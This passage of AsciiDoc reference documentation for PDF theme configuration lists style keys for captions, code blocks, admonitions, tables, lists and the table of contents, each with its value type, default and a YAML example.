image\n|\n* listing\n* literal\n* table\n|===\n\n[#keys-caption]\n=== Caption\n\nThe keys in this category control the arrangement and style of block captions.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-caption]*Key Prefix:* <<key-prefix-caption,caption>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: left)\n|caption:\n align: left\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|caption:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|caption:\n font_family: M+ 1mn\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|caption:\n font_size: 11\n\n|font_style\n|<<font-styles,Font style>> +\n(default: italic)\n|caption:\n font_style: italic\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|caption:\n text_transform: uppercase\n\n|margin_inside\n|<<measurement-units,Measurement>> +\n(default: 4)\n|caption:\n margin_inside: 3\n\n|margin_outside\n|<<measurement-units,Measurement>> +\n(default: 0)\n|caption:\n margin_outside: 0\n|===\n\n[#keys-code]\n=== Code\n\nThe keys in this category are used to control the style of literal, listing and source blocks.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-code]*Key Prefix:* <<key-prefix-code,code>>\n\n|background_color\n|<<colors,Color>> +\n(default: _not set_)\n|code:\n background_color: #f5f5f5\n\n|border_color\n|<<colors,Color>> +\n(default: #eeeeee)\n|code:\n border_color: 
#cccccc\n\n|border_radius\n|<<values,Number>> +\n(default: _not set_)\n|code:\n border_radius: 4\n\n|border_width\n|<<values,Number>> +\n(default: 0.5)\n|code:\n border_width: 0.75\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|code:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: Courier)\n|code:\n font_family: M+ 1mn\n\n|font_size\n|<<values,Number>> +\n(default: 10.5)\n|code:\n font_size: 11\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|code:\n font_style: italic\n\n|line_height\n|<<values,Number>> +\n(default: 1.2)\n|code:\n line_height: 1.25\n\n|line_gap^[1]^\n|<<values,Number>> +\n(default: 0)\n|code:\n line_gap: 3.8\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: 9)\n|code:\n padding: 11\n\n3+|[#key-prefix-code-linenum]*Key Prefix:* <<key-prefix-code-linenum,code_linenum>>^[2]^\n\n|font_color\n|<<colors,Color>> +\n(default: #999999)\n|code:\n linenum_font_color: #ccc\n|===\n\n. The line_gap is used to tune the height of the background color applied to a span of block text highlighted using Rouge.\n. The code_linenum category only applies when using Pygments as the source highlighter.\nOtherwise, the style is controlled by the source highlighter theme.\n
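\nAs an illustration, here's a minimal sketch that gives literal, listing and source blocks a light gray panel (the values are arbitrary picks, not theme defaults):\n\n[source,yaml]\n----\ncode:\n  font_size: 10.5\n  background_color: '#f5f5f5'\n  border_color: '#cccccc'\n  border_radius: 4\n  padding: 11\n----\n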
\n[#keys-callout-numbers]\n=== Callout Numbers\n\nThe keys in this category are used to control the style of callout numbers (conums) inside verbatim blocks and in callout lists (colists).\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-conum]*Key Prefix:* <<key-prefix-conum,conum>>\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|conum:\n font_color: #b12146\n\n|font_family^[1,2]^\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|conum:\n font_family: M+ 1mn\n\n|font_size^[2]^\n|<<values,Number>> +\n(default: _inherit_)\n|conum:\n font_size: $base_font_size\n\n|font_style^[2]^\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|conum:\n font_style: normal\n\n|line_height^[2]^\n|<<values,Number>> +\n(default: 1.15)\n|conum:\n line_height: 4 \/ 3\n|===\n\n. Currently, the font must contain the circle numbers starting at glyph U+2460.\n. font_family, font_size, font_style, and line_height are only used for markers in a colist.\nThese properties are inherited for conums inside a verbatim block.\n\n[#keys-menu]\n=== Menu\n\nThe keys in this category apply to the menu label (generated from the inline menu macro).\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-menu]*Key Prefix:* <<key-prefix-menu,menu>>\n\n|caret_content\n|<<quoted-string,Quoted string>> +\n(default: \" \\u203a \")\n|menu:\n caret_content: ' > '\n|===\n\n[#keys-blockquote]\n=== Blockquote\n\nThe keys in this category control the arrangement and style of quote blocks.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-blockquote]*Key Prefix:* <<key-prefix-blockquote,blockquote>>\n\n|border_width^[1]^\n|<<values,Number>> +\n(default: 4)\n|blockquote:\n border_width: 5\n\n|border_color^[1]^\n|<<colors,Color>> +\n(default: #eeeeee)\n|blockquote:\n border_color: #eeeeee\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|blockquote:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|blockquote:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|blockquote:\n font_size: 13\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|blockquote:\n font_style: bold\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|blockquote:\n text_transform: uppercase\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: [6, 12, -6, 14])\n|blockquote:\n padding: [5, 10, -5, 12]\n\n3+|[#key-prefix-blockquote-cite]*Key Prefix:* <<key-prefix-blockquote-cite,blockquote_cite>>\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|blockquote:\n cite:\n font_size: 9\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|blockquote:\n cite:\n font_color: #999999\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|blockquote:\n cite:\n font_family: Noto Serif\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|blockquote:\n cite:\n font_style: bold\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|blockquote:\n cite:\n text_transform: uppercase\n|===\n\n. 
Only applies to the left side.\n\n[#keys-sidebar]\n=== Sidebar\n\nThe keys in this category control the arrangement and style of sidebar blocks.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-sidebar]*Key Prefix:* <<key-prefix-sidebar,sidebar>>\n\n|background_color\n|<<colors,Color>> +\n(default: #eeeeee)\n|sidebar:\n background_color: #eeeeee\n\n|border_color\n|<<colors,Color>> +\n(default: _not set_)\n|sidebar:\n border_color: #ffffff\n\n|border_radius\n|<<values,Number>> +\n(default: _not set_)\n|sidebar:\n border_radius: 4\n\n|border_width\n|<<values,Number>> +\n(default: _not set_)\n|sidebar:\n border_width: 0.5\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|sidebar:\n font_color: #262626\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|sidebar:\n font_family: M+ 1p\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|sidebar:\n font_size: 13\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|sidebar:\n font_style: italic\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|sidebar:\n text_transform: uppercase\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: [12, 12, 0, 12])\n|sidebar:\n padding: [12, 15, 0, 15]\n\n3+|[#key-prefix-sidebar-title]*Key Prefix:* <<key-prefix-sidebar-title,sidebar_title>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: center)\n|sidebar:\n title:\n align: center\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|sidebar:\n title:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|sidebar:\n title:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|sidebar:\n title:\n font_size: 13\n\n|font_style\n|<<font-styles,Font style>> +\n(default: bold)\n|sidebar:\n title:\n font_style: bold\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|sidebar:\n title:\n text_transform: uppercase\n|===\n\n[#keys-example]\n=== Example\n\nThe keys in this category control the arrangement and style of example blocks.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-example]*Key Prefix:* <<key-prefix-example,example>>\n\n|background_color\n|<<colors,Color>> +\n(default: #ffffff)\n|example:\n background_color: #fffef7\n\n|border_color\n|<<colors,Color>> +\n(default: #eeeeee)\n|example:\n border_color: #eeeeee\n\n|border_radius\n|<<values,Number>> +\n(default: _not set_)\n|example:\n border_radius: 4\n\n|border_width\n|<<values,Number>> +\n(default: 0.5)\n|example:\n border_width: 0.75\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|example:\n font_color: #262626\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|example:\n font_family: M+ 1p\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|example:\n font_size: 13\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|example:\n font_style: italic\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|example:\n text_transform: uppercase\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: [12, 12, 0, 12])\n|example:\n padding: [15, 15, 0, 15]\n|===\n\n[#keys-admonition]\n=== Admonition\n\nThe keys in this category control the arrangement and style of admonition blocks and the icon used for each admonition 
type.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-admonition]*Key Prefix:* <<key-prefix-admonition,admonition>>\n\n|column_rule_color\n|<<colors,Color>> +\n(default: #eeeeee)\n|admonition:\n column_rule_color: #aa0000\n\n|column_rule_style\n|solid {vbar} double {vbar} dashed {vbar} dotted +\n(default: solid)\n|admonition:\n column_rule_style: double\n\n|column_rule_width\n|<<values,Number>> +\n(default: 0.5)\n|admonition:\n column_rule_width: 0.5\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|admonition:\n font_color: #999999\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|admonition:\n font_family: Noto Sans\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|admonition:\n font_size: $base_font_size_large\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|admonition:\n font_style: italic\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|admonition:\n text_transform: none\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: [0, 12, 0, 12])\n|admonition:\n padding: [0, 12, 0, 12]\n\n3+|[#key-prefix-admonition-label]*Key Prefix:* <<key-prefix-admonition-label,admonition_label>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: center)\n|admonition:\n label:\n align: center\n\n|min_width\n|<<measurement-units,Measurement>> +\n(default: _not set_)\n|admonition:\n label:\n min_width: 48\n\n|padding^[1]^\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: $admonition_padding)\n|admonition:\n label:\n padding: [0, 12, 0, 12]\n\n|vertical_align\n|top {vbar} middle {vbar} bottom +\n(default: middle)\n|admonition:\n label:\n vertical_align: top\n\n3+|*Key Prefix:* admonition_label, admonition_label_<name>^[2]^\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|admonition:\n label:\n font_color: #262626\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|admonition:\n label:\n font_family: M+ 1p\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|admonition:\n label:\n font_size: 12\n\n|font_style\n|<<font-styles,Font style>> +\n(default: bold)\n|admonition:\n label:\n font_style: bold_italic\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: uppercase)\n|admonition:\n label:\n text_transform: lowercase\n\n3+|[#key-prefix-admonition-icon]*Key Prefix:* <<key-prefix-admonition-icon,admonition_icon_<name> >>^[2]^\n\n|name\n|<icon set>-<icon name>^[3]^ +\n(default: _not set_)\n|admonition:\n icon:\n tip:\n name: fa-fire\n\n|stroke_color\n|<<colors,Color>> +\n(default: caution=#bf3400; important=#bf0000; note=#19407c; tip=#111111; warning=#bf6900)\n|admonition:\n icon:\n important:\n stroke_color: ff0000\n\n|size\n|<<values,Number>> +\n(default: 24)\n|admonition:\n icon:\n note:\n size: 24\n|===\n\n. The top and bottom padding values are ignored on admonition_label_padding.\n. `<name>` can be `note`, `tip`, `warning`, `important`, or `caution`.\nThe subkeys in the icon category cannot be flattened (e.g., `tip_name: fa-lightbulb-o` is not valid syntax).\n. Required.\nSee the `.yml` files in the https:\/\/github.com\/jessedoyle\/prawn-icon\/tree\/master\/data\/fonts[prawn-icon repository] for a list of valid icon names.\nThe prefix (e.g., `fa-`) determines which font set to use.\n
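\nFor example, here's a minimal sketch that swaps the icon and accent color used for TIP admonitions (the icon name mirrors the table example above; the color is an arbitrary pick):\n\n[source,yaml]\n----\nadmonition:\n  icon:\n    tip:\n      name: fa-fire\n      stroke_color: '#b12146'\n      size: 24\n----\n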
\n[#keys-image]\n=== Image\n\nThe keys in this category control the arrangement of block images.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-image]*Key Prefix:* <<key-prefix-image,image>>\n\n|align\n|<<image-alignments,Image alignment>> +\n(default: left)\n|image:\n align: left\n\n|width^[1]^\n|<<measurement-units,Measurement>> +\n(default: _not set_)\n|image:\n width: 100%\n|===\n\n. Only applies to block images.\nIf specified, this value takes precedence over the value of the `width` attribute on the image macro, but not over the value of the `pdfwidth` attribute.\n\n[#keys-lead]\n=== Lead\n\nThe keys in this category control the styling of lead paragraphs.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-lead]*Key Prefix:* <<key-prefix-lead,lead>>\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|lead:\n font_color: #262626\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|lead:\n font_family: M+ 1p\n\n|font_size\n|<<values,Number>> +\n(default: 13.5)\n|lead:\n font_size: 13\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|lead:\n font_style: bold\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|lead:\n text_transform: uppercase\n\n|line_height\n|<<values,Number>> +\n(default: 1.4)\n|lead:\n line_height: 1.4\n|===\n\n[#keys-abstract]\n=== Abstract\n\nThe keys in this category control the arrangement and style of the abstract.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-abstract]*Key Prefix:* <<key-prefix-abstract,abstract>>\n\n|font_color\n|<<colors,Color>> +\n(default: $base_font_color)\n|abstract:\n font_color: #5c6266\n\n|font_size\n|<<values,Number>> +\n(default: 13.5)\n|abstract:\n font_size: 13\n\n|font_style\n|<<font-styles,Font style>> +\n(default: $base_font_style)\n|abstract:\n font_style: italic\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: $base_text_transform)\n|abstract:\n text_transform: uppercase\n\n|line_height\n|<<values,Number>> +\n(default: 1.4)\n|abstract:\n line_height: 1.4\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: 0)\n|abstract:\n padding: [0, 12, 0, 12]\n\n3+|[#key-prefix-abstract-title]*Key Prefix:* <<key-prefix-abstract-title,abstract_title>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: center)\n|abstract:\n title:\n align: center\n\n|font_color\n|<<colors,Color>> +\n(default: $base_font_color)\n|abstract:\n title:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: $base_font_family)\n|abstract:\n title:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: $base_font_size)\n|abstract:\n title:\n font_size: 13\n\n|font_style\n|<<font-styles,Font style>> +\n(default: bold)\n|abstract:\n title:\n font_style: bold\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: $base_text_transform)\n|abstract:\n title:\n text_transform: uppercase\n|===\n\n[#keys-thematic-break]\n=== Thematic Break\n\nThe keys in this category control the style of thematic breaks (aka horizontal rules).\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-thematic-break]*Key Prefix:* 
<<key-prefix-thematic-break,thematic_break>>\n\n|border_color\n|<<colors,Color>> +\n(default: #eeeeee)\n|thematic_break:\n border_color: #eeeeee\n\n|border_style\n|solid {vbar} double {vbar} dashed {vbar} dotted +\n(default: solid)\n|thematic_break:\n border_style: dashed\n\n|border_width\n|<<measurement-units,Measurement>> +\n(default: 0.5)\n|thematic_break:\n border_width: 0.5\n\n|margin_top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|thematic_break:\n margin_top: 6\n\n|margin_bottom\n|<<measurement-units,Measurement>> +\n(default: $vertical_spacing)\n|thematic_break:\n margin_bottom: 18\n|===\n\n[#keys-description-list]\n=== Description List\n\nThe keys in this category control the arrangement and style of definition list items (terms and descriptions).\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-description-list]*Key Prefix:* <<key-prefix-description-list,description_list>>\n\n|term_font_style\n|<<font-styles,Font style>> +\n(default: bold)\n|description_list:\n term_font_style: italic\n\n|term_spacing\n|<<measurement-units,Measurement>> +\n(default: 4)\n|description_list:\n term_spacing: 5\n\n|description_indent\n|<<values,Number>> +\n(default: 30)\n|description_list:\n description_indent: 15\n|===\n\n[#keys-outline-list]\n=== Outline List\n\nThe keys in this category control the arrangement and style of outline list items.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-outline-list]*Key Prefix:* <<key-prefix-outline-list,outline_list>>\n\n|indent\n|<<measurement-units,Measurement>> +\n(default: 30)\n|outline_list:\n indent: 40\n\n|item_spacing\n|<<measurement-units,Measurement>> +\n(default: 6)\n|outline_list:\n item_spacing: 4\n\n|marker_font_color^[1]^\n|<<colors,Color>> +\n(default: _inherit_)\n|outline_list:\n marker_font_color: #3c763d \n\n|text_align^[2]^\n|<<text-alignments,Text alignment>> +\n(default: $base_align)\n|outline_list:\n text_align: left\n|===\n\n. Controls the color of the bullet glyph that marks items in unordered lists and the number for items in ordered lists.\n. Controls the alignment of the list text only, not nested content (blocks or lists).\n\n[#keys-ulist]\n=== Unordered List\n\nThe keys in this category control the arrangement and style of unordered list items.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-ulist-marker]*Key Prefix:* <<key-prefix-ulist-marker,ulist_marker>>\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|ulist:\n marker:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|ulist:\n marker:\n font_size: 9\n\n|font_color\n|<<colors,Color>> +\n(default: $outline_list_marker_font_color)\n|ulist:\n marker:\n font_color: #cccccc\n\n|line_height\n|<<values,Number>> +\n(default: $base_line_height)\n|ulist:\n marker:\n line_height: 1.5\n|===\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|*Key Prefix:* ulist_marker_<type>^[1]^\n\n|content\n|<<quoted-string,Quoted string>>\n|ulist:\n marker:\n disc:\n content: \"\\uf140\"\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|ulist:\n marker:\n disc:\n font_family: fa\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|ulist:\n marker:\n disc:\n font_size: 9\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|ulist:\n marker:\n disc:\n font_color: #ff0000\n\n|line_height\n|<<values,Number>> +\n(default: _inherit_)\n|ulist:\n marker:\n disc:\n line_height: 2\n|===\n\n. 
`<type>` is one of `disc`, `square`, `circle`, `checked`, or `unchecked`.\n\n[#keys-table]\n=== Table\n\nThe keys in this category control the arrangement and style of tables and table cells.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-table]*Key Prefix:* <<key-prefix-table,table>>\n\n|background_color\n|<<colors,Color>> +\n(default: transparent)\n|table:\n background_color: #ffffff\n\n|border_color\n|<<colors,Color>> +\n(default: #000000)\n|table:\n border_color: #dddddd\n\n|border_style\n|solid {vbar} dashed {vbar} dotted +\n(default: solid)\n|table:\n border_style: solid\n\n|border_width\n|<<values,Number>> +\n(default: 0.5)\n|table:\n border_width: 0.5\n\n|caption_side\n|top {vbar} bottom +\n(default: top)\n|table:\n caption_side: bottom\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|table:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|table:\n font_family: Helvetica\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|table:\n font_size: 9.5\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|table:\n font_style: italic\n\n|grid_color\n|<<colors,Color>> +\n(default: $table_border_color)\n|table:\n grid_color: #eeeeee\n\n|grid_style\n|solid {vbar} dashed {vbar} dotted +\n(default: solid)\n|table:\n grid_style: dashed\n\n|grid_width\n|<<values,Number>> +\n(default: $table_border_width)\n|table:\n grid_width: 0.5\n\n3+|[#key-prefix-table-head]*Key Prefix:* <<key-prefix-table-head,table_head>>\n\n\/\/|align\n\/\/|<<text-alignments,Text alignment>> +\n\/\/(default: _inherit_)\n\/\/|table:\n\/\/ head:\n\/\/ align: center\n\n|background_color\n|<<colors,Color>> +\n(default: $table_background_color)\n|table:\n head:\n background_color: #f0f0f0\n\n|font_color\n|<<colors,Color>> +\n(default: $table_font_color)\n|table:\n head:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: $table_font_family)\n|table:\n head:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: $table_font_size)\n|table:\n head:\n font_size: 10\n\n|font_style\n|<<font-styles,Font style>> +\n(default: bold)\n|table:\n head:\n font_style: normal\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|table:\n head:\n text_transform: uppercase\n\n3+|[#key-prefix-table-body]*Key Prefix:* <<key-prefix-table-body,table_body>>\n\n|background_color\n|<<colors,Color>> +\n(default: $table_background_color)\n|table:\n body:\n background_color: #fdfdfd\n\n|stripe_background_color^[1]^\n|<<colors,Color>> +\n(default: #eeeeee)\n|table:\n body:\n stripe_background_color: #efefef\n\n3+|[#key-prefix-table-foot]*Key Prefix:* <<key-prefix-table-foot,table_foot>>\n\n|background_color\n|<<colors,Color>> +\n(default: $table_background_color)\n|table:\n foot:\n background_color: #f0f0f0\n\n|font_color\n|<<colors,Color>> +\n(default: $table_font_color)\n|table:\n foot:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: $table_font_family)\n|table:\n foot:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: $table_font_size)\n|table:\n foot:\n font_size: 10\n\n|font_style\n|<<font-styles,Font style>> +\n(default: normal)\n|table:\n foot:\n font_style: italic\n\n\/\/deprecated\n\/\/3+|[#key-prefix-table-row]*Key Prefix:* <<key-prefix-table-row,table_<parity>_row>>^[1]^\n\/\/\n\/\/|background_color\n\/\/|<<colors,Color>> +\n\/\/(default: $table_background_color)\n\/\/|table:\n\/\/ even_row:\n\/\/ background_color: 
#f9f9f9\n\n3+|[#key-prefix-table-cell]*Key Prefix:* <<key-prefix-table-cell,table_cell>>\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: 2)\n|table:\n cell:\n padding: 3\n\n3+|[#key-prefix-table-header-cell]*Key Prefix:* <<key-prefix-table-header-cell,table_header_cell>>\n\n\/\/|align\n\/\/|<<text-alignments,Text alignment>> +\n\/\/(default: $table_head_align)\n\/\/|table:\n\/\/ header_cell:\n\/\/ align: center\n\n|background_color\n|<<colors,Color>> +\n(default: $table_head_background_color)\n|table:\n header_cell:\n background_color: #f0f0f0\n\n|font_color\n|<<colors,Color>> +\n(default: $table_head_font_color)\n|table:\n header_cell:\n font_color: #1a1a1a\n\n|font_family\n|<<fonts,Font family name>> +\n(default: $table_head_font_family)\n|table:\n header_cell:\n font_family: Noto Sans\n\n|font_size\n|<<values,Number>> +\n(default: $table_head_font_size)\n|table:\n header_cell:\n font_size: 12\n\n|font_style\n|<<font-styles,Font style>> +\n(default: $table_head_font_style)\n|table:\n header_cell:\n font_style: italic\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: $table_head_text_transform)\n|table:\n header_cell:\n text_transform: uppercase\n|===\n\n. Applied to even rows by default; control which rows are striped using the `stripes` attribute on the table (accepts `even`, `odd`, `all`, or `none`).\n\/\/. `<parity>` can be `odd` (odd rows) or `even` (even rows).\n
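\nFor example, here's a minimal sketch that lightens the table borders and adds a subtle header tint (the colors are arbitrary picks, not theme defaults):\n\n[source,yaml]\n----\ntable:\n  border_color: '#dddddd'\n  border_width: 0.5\n  head:\n    background_color: '#f0f0f0'\n  body:\n    stripe_background_color: '#f9f9f9'\n  cell:\n    padding: 3\n----\n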
\n[#keys-table-of-contents]\n=== Table of Contents (TOC)\n\nThe keys in this category control the arrangement and style of the table of contents.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-toc]*Key Prefix:* <<key-prefix-toc,toc>>\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|toc:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|toc:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|toc:\n font_size: 9\n\n|font_style\n|<<font-styles,Font style>> +\n\/\/ QUESTION why is the default not inherited?\n(default: normal)\n|toc:\n font_style: bold\n\n|text_decoration\n|none {vbar} underline +\n(default: none)\n|toc:\n text_decoration: underline\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|toc:\n text_transform: uppercase\n\n|line_height\n|<<values,Number>> +\n(default: 1.4)\n|toc:\n line_height: 1.5\n\n|indent\n|<<measurement-units,Measurement>> +\n(default: 15)\n|toc:\n indent: 20\n\n|margin_top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|toc:\n margin_top: 0\n\n3+|[#key-prefix-toc-level]*Key Prefix:* <<key-prefix-toc-level,toc_h<n> >>^[1]^\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|toc:\n h3_font_color: #999999\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|toc:\n h3_font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|toc:\n h3_font_size: 9\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|toc:\n h3_font_style: italic\n\n|text_decoration\n|none {vbar} underline +\n(default: _inherit_)\n|toc:\n h3_text_decoration: none\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|toc:\n h3_text_transform: uppercase\n\n3+|[#key-prefix-toc-title]*Key Prefix:* <<key-prefix-toc-title,toc_title>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: $heading_h2_align)\n|toc:\n title:\n align: right\n\n|font_color\n|<<colors,Color>> +\n(default: $heading_h2_font_color)\n|toc:\n title:\n font_color: #aa0000\n\n|font_family\n|<<fonts,Font family name>> +\n(default: $heading_h2_font_family)\n|toc:\n title:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: $heading_h2_font_size)\n|toc:\n title:\n font_size: 18\n\n|font_style\n|<<font-styles,Font style>> +\n(default: $heading_h2_font_style)\n|toc:\n title:\n font_style: bold_italic\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: $heading_h2_text_transform)\n|toc:\n title:\n text_transform: uppercase\n\n3+|[#key-prefix-toc-dot-leader]*Key Prefix:* <<key-prefix-toc-dot-leader,toc_dot_leader>>\n\n|content\n|<<quoted-string,Quoted string>> +\n(default: '. ')\n|toc:\n dot_leader:\n content: \". \"\n\n|font_color^[2]^\n|<<colors,Color>> +\n(default: _inherit_)\n|toc:\n dot_leader:\n font_color: #999999\n\n|font_style^[2]^\n|<<font-styles,Font style>> +\n(default: normal)\n|toc:\n dot_leader:\n font_style: bold\n\n|levels^[3]^\n|all {vbar} none {vbar} Integers (space-separated) +\n(default: all)\n|toc:\n dot_leader:\n levels: 2 3\n|===\n\n. `<n>` is a number ranging from 1 to 6, representing each of the six heading levels.\n. The dot leader inherits all font properties except `font_style` from the root `toc` category.\n. 0-based levels (e.g., part = 0, chapter = 1).\nDot leaders are only shown for the specified levels.\nIf the value is not specified, dot leaders are shown for all levels.\n\n[#keys-running-content]\n=== Running Content (Header & Footer)\n\nThe keys in this category control the arrangement and style of running header and footer content.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-header]*Key Prefix:* <<key-prefix-header,header>>\n\n|background_color^[1]^\n|<<colors,Color>> +\n(default: _not set_)\n|header:\n background_color: #eeeeee\n\n|border_color\n|<<colors,Color>> +\n(default: _not set_)\n|header:\n border_color: #dddddd\n\n|border_style\n|solid {vbar} double 